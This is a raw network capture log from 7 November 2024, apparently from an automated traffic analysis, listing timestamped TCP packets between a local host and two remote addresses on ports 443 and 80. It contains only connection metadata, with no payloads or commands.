Nov 7, 2024 07:33:04.005400896 CET	49765	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:04.005404949 CET	443	49765	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:04.008404970 CET	49770	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:04.008455992 CET	443	49770	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:04.008548975 CET	49770	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:04.008646965 CET	49770	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:04.008682013 CET	443	49770	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:04.030343056 CET	443	49766	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:04.030385971 CET	443	49766	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:04.030436039 CET	49766	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:04.030543089 CET	49766	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:04.030554056 CET	443	49766	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:04.030564070 CET	49766	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:04.030567884 CET	443	49766	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:04.032562971 CET	49771	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:04.032586098 CET	443	49771	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:04.032641888 CET	49771	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:04.032929897 CET	49771	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:04.032941103 CET	443	49771	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:04.033401966 CET	443	49767	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:04.033446074 CET	443	49767	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:04.033483028 CET	49767	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:04.033571005 CET	49767	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:04.033575058 CET	443	49767	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:04.033605099 CET	49767	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:04.033607960 CET	443	49767	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:04.035494089 CET	49772	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:04.035521984 CET	443	49772	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:04.035588980 CET	49772	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:04.035686970 CET	49772	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:04.035700083 CET	443	49772	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:04.170878887 CET	49773	80	192.168.2.4	185.215.113.43
Nov 7, 2024 07:33:04.175961018 CET	80	49773	185.215.113.43	192.168.2.4
Nov 7, 2024 07:33:04.176062107 CET	49773	80	192.168.2.4	185.215.113.43
Nov 7, 2024 07:33:04.176232100 CET	49773	80	192.168.2.4	185.215.113.43
Nov 7, 2024 07:33:04.181001902 CET	80	49773	185.215.113.43	192.168.2.4
Nov 7, 2024 07:33:04.618562937 CET	443	49768	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:04.619062901 CET	49768	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:04.619090080 CET	443	49768	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:04.619669914 CET	49768	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:04.619688034 CET	443	49768	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:04.656688929 CET	443	49769	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:04.657098055 CET	49769	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:04.657120943 CET	443	49769	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:04.657480001 CET	49769	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:04.657489061 CET	443	49769	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:04.738799095 CET	443	49770	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:04.739131927 CET	49770	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:04.739154100 CET	443	49770	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:04.739497900 CET	49770	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:04.739510059 CET	443	49770	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:04.746795893 CET	443	49768	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:04.746905088 CET	443	49768	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:04.747014999 CET	49768	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:04.747057915 CET	49768	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:04.747057915 CET	49768	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:04.747103930 CET	443	49768	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:04.747129917 CET	443	49768	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:04.749588966 CET	49774	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:04.749618053 CET	443	49774	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:04.749695063 CET	49774	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:04.749835968 CET	49774	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:04.749849081 CET	443	49774	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:04.768590927 CET	443	49772	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:04.768878937 CET	49772	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:04.768887043 CET	443	49772	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:04.769242048 CET	49772	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:04.769246101 CET	443	49772	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:04.788532972 CET	443	49769	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:04.788676023 CET	443	49769	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:04.788723946 CET	49769	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:04.788748026 CET	49769	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:04.788759947 CET	443	49769	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:04.788774967 CET	49769	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:04.788778067 CET	443	49769	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:04.790656090 CET	49775	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:04.790687084 CET	443	49775	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:04.790754080 CET	49775	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:04.790863991 CET	49775	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:04.790877104 CET	443	49775	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:04.801970005 CET	443	49771	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:04.802222013 CET	49771	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:04.802234888 CET	443	49771	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:04.802539110 CET	49771	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:04.802542925 CET	443	49771	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:04.868452072 CET	443	49770	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:04.868674994 CET	443	49770	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:04.868736982 CET	49770	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:04.868782997 CET	49770	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:04.868782997 CET	49770	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:04.868815899 CET	443	49770	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:04.868844032 CET	443	49770	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:04.871265888 CET	49776	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:04.871283054 CET	443	49776	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:04.871359110 CET	49776	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:04.871499062 CET	49776	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:04.871507883 CET	443	49776	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:04.897613049 CET	443	49772	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:04.898195982 CET	443	49772	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:04.898253918 CET	49772	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:04.898283958 CET	49772	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:04.898302078 CET	443	49772	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:04.898312092 CET	49772	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:04.898318052 CET	443	49772	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:04.900069952 CET	49777	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:04.900135994 CET	443	49777	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:04.900340080 CET	49777	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:04.900340080 CET	49777	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:04.900404930 CET	443	49777	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:04.939604044 CET	443	49771	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:04.939866066 CET	443	49771	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:04.939932108 CET	49771	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:04.939954042 CET	49771	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:04.939964056 CET	443	49771	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:04.939971924 CET	49771	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:04.939975977 CET	443	49771	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:04.941952944 CET	49778	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:04.941966057 CET	443	49778	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:04.942049026 CET	49778	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:04.942178965 CET	49778	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:04.942188025 CET	443	49778	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:05.126418114 CET	80	49773	185.215.113.43	192.168.2.4
Nov 7, 2024 07:33:05.126472950 CET	49773	80	192.168.2.4	185.215.113.43
Nov 7, 2024 07:33:05.493469000 CET	443	49774	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:05.494136095 CET	49774	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:05.494162083 CET	443	49774	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:05.494689941 CET	49774	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:05.494693995 CET	443	49774	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:05.529052973 CET	443	49775	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:05.531265020 CET	49775	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:05.531281948 CET	443	49775	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:05.531630039 CET	49775	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:05.531635046 CET	443	49775	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:05.587732077 CET	443	49776	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:05.588206053 CET	49776	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:05.588224888 CET	443	49776	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:05.588596106 CET	49776	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:05.588599920 CET	443	49776	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:05.625922918 CET	443	49774	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:05.625979900 CET	443	49774	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:05.626143932 CET	49774	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:05.626164913 CET	49774	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:05.626178026 CET	443	49774	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:05.626187086 CET	49774	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:05.626190901 CET	443	49774	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:05.628675938 CET	49779	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:05.628716946 CET	443	49779	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:05.628793955 CET	49779	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:05.628931999 CET	49779	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:05.628946066 CET	443	49779	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:05.651767015 CET	443	49777	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:05.652045012 CET	49777	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:05.652055979 CET	443	49777	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:05.652437925 CET	49777	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:05.652443886 CET	443	49777	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:05.661684990 CET	443	49775	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:05.661746025 CET	443	49775	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:05.661860943 CET	49775	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:05.661880970 CET	49775	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:05.661889076 CET	443	49775	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:05.661899090 CET	49775	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:05.661902905 CET	443	49775	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:05.663832903 CET	49780	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:05.663846970 CET	443	49780	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:05.663909912 CET	49780	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:05.664024115 CET	49780	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:05.664035082 CET	443	49780	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:05.685770035 CET	443	49778	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:05.686074972 CET	49778	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:05.686088085 CET	443	49778	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:05.686440945 CET	49778	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:05.686445951 CET	443	49778	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:05.714668036 CET	443	49776	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:05.714822054 CET	443	49776	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:05.714893103 CET	49776	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:05.715004921 CET	49776	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:05.715017080 CET	443	49776	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:05.715045929 CET	49776	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:05.715049982 CET	443	49776	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:05.717020988 CET	49781	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:05.717047930 CET	443	49781	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:05.717300892 CET	49781	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:05.717437983 CET	49781	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:05.717452049 CET	443	49781	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:05.787583113 CET	443	49777	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:05.787630081 CET	443	49777	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:05.787678003 CET	49777	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:05.787798882 CET	49777	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:05.787817955 CET	443	49777	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:05.787832022 CET	49777	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:05.787838936 CET	443	49777	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:05.789572954 CET	49782	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:05.789586067 CET	443	49782	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:05.789657116 CET	49782	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:05.789769888 CET	49782	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:05.789781094 CET	443	49782	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:05.818963051 CET	443	49778	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:05.819230080 CET	443	49778	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:05.819288969 CET	49778	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:05.819319963 CET	49778	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:05.819334030 CET	443	49778	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:05.819344044 CET	49778	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:05.819348097 CET	443	49778	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:05.821188927 CET	49783	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:05.821202993 CET	443	49783	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:05.821271896 CET	49783	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:05.821393967 CET	49783	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:05.821405888 CET	443	49783	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:06.347345114 CET	443	49779	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:06.347812891 CET	49779	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:06.347835064 CET	443	49779	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:06.348217010 CET	49779	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:06.348223925 CET	443	49779	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:06.393294096 CET	443	49780	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:06.393659115 CET	49780	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:06.393675089 CET	443	49780	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:06.393991947 CET	49780	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:06.393996954 CET	443	49780	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:06.470458984 CET	443	49781	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:06.470793009 CET	49781	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:06.470808983 CET	443	49781	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:06.471158028 CET	49781	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:06.471163988 CET	443	49781	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:06.474509954 CET	443	49779	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:06.474564075 CET	443	49779	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:06.474615097 CET	49779	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:06.474728107 CET	49779	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:06.474745035 CET	443	49779	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:06.474759102 CET	49779	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:06.474765062 CET	443	49779	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:06.477237940 CET	49784	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:06.477267981 CET	443	49784	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:06.477344036 CET	49784	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:06.477489948 CET	49784	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:06.477503061 CET	443	49784	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:06.524133921 CET	443	49780	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:06.524178028 CET	443	49780	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:06.524311066 CET	49780	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:06.524454117 CET	49780	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:06.524463892 CET	443	49780	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:06.524473906 CET	49780	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:06.524477005 CET	443	49780	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:06.526576042 CET	49785	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:06.526607990 CET	443	49785	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:06.526673079 CET	49785	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:06.526774883 CET	49785	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:06.526788950 CET	443	49785	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:06.549745083 CET	443	49782	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:06.550049067 CET	49782	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:06.550061941 CET	443	49782	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:06.550367117 CET	49782	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:06.550370932 CET	443	49782	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:06.551457882 CET	443	49783	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:06.551671028 CET	49783	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:06.551683903 CET	443	49783	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:06.551970005 CET	49783	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:06.551975012 CET	443	49783	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:06.614593029 CET	443	49781	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:06.617686033 CET	443	49781	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:06.617743015 CET	49781	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:06.617773056 CET	49781	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:06.617790937 CET	443	49781	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:06.617803097 CET	49781	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:06.617809057 CET	443	49781	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:06.620007992 CET	49786	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:06.620018959 CET	443	49786	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:06.620096922 CET	49786	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:06.620222092 CET	49786	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:06.620232105 CET	443	49786	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:06.635327101 CET	49773	80	192.168.2.4	185.215.113.43
Nov 7, 2024 07:33:06.635560989 CET	49787	80	192.168.2.4	185.215.113.43
Nov 7, 2024 07:33:06.640391111 CET	80	49787	185.215.113.43	192.168.2.4
Nov 7, 2024 07:33:06.640453100 CET	49787	80	192.168.2.4	185.215.113.43
Nov 7, 2024 07:33:06.640537977 CET	49787	80	192.168.2.4	185.215.113.43
Nov 7, 2024 07:33:06.640701056 CET	80	49773	185.215.113.43	192.168.2.4
Nov 7, 2024 07:33:06.640752077 CET	49773	80	192.168.2.4	185.215.113.43
Nov 7, 2024 07:33:06.645314932 CET	80	49787	185.215.113.43	192.168.2.4
Nov 7, 2024 07:33:06.680984020 CET	443	49783	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:06.681037903 CET	443	49783	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:06.681091070 CET	49783	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:06.681205988 CET	49783	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:06.681211948 CET	443	49783	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:06.681221008 CET	49783	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:06.681225061 CET	443	49783	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:06.683353901 CET	49788	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:06.683382034 CET	443	49788	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:06.683463097 CET	49788	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:06.683577061 CET	49788	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:06.683584929 CET	443	49788	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:06.684309006 CET	443	49782	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:06.684348106 CET	443	49782	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:06.684395075 CET	49782	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:06.684473038 CET	49782	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:06.684473038 CET	49782	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:06.684487104 CET	443	49782	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:06.684494972 CET	443	49782	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:06.686053038 CET	49789	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:06.686079025 CET	443	49789	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:06.686147928 CET	49789	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:06.686259985 CET	49789	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:06.686270952 CET	443	49789	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:07.204838991 CET	443	49784	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:07.205281019 CET	49784	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:07.205302954 CET	443	49784	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:07.205739021 CET	49784	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:07.205744028 CET	443	49784	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:07.333954096 CET	443	49784	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:07.334315062 CET	443	49784	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:07.334377050 CET	49784	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:07.334414005 CET	49784	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:07.334423065 CET	443	49784	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:07.334433079 CET	49784	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:07.334436893 CET	443	49784	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:07.336750031 CET	49790	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:07.336785078 CET	443	49790	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:07.336854935 CET	49790	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:07.336992025 CET	49790	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:07.337002993 CET	443	49790	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:07.348499060 CET	443	49786	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:07.348814011 CET	49786	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:07.348825932 CET	443	49786	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:07.349236012 CET	49786	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:07.349240065 CET	443	49786	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:07.415636063 CET	443	49789	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:07.415954113 CET	49789	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:07.415970087 CET	443	49789	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:07.416584969 CET	49789	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:07.416589022 CET	443	49789	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:07.417751074 CET	443	49788	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:07.418152094 CET	49788	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:07.418162107 CET	443	49788	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:07.418529034 CET	49788	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:07.418533087 CET	443	49788	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:07.482120037 CET	443	49786	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:07.482464075 CET	443	49786	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:07.482510090 CET	49786	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:07.482538939 CET	49786	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:07.482544899 CET	443	49786	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:07.482553005 CET	49786	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:07.482558012 CET	443	49786	13.107.246.45	192.168.2.4
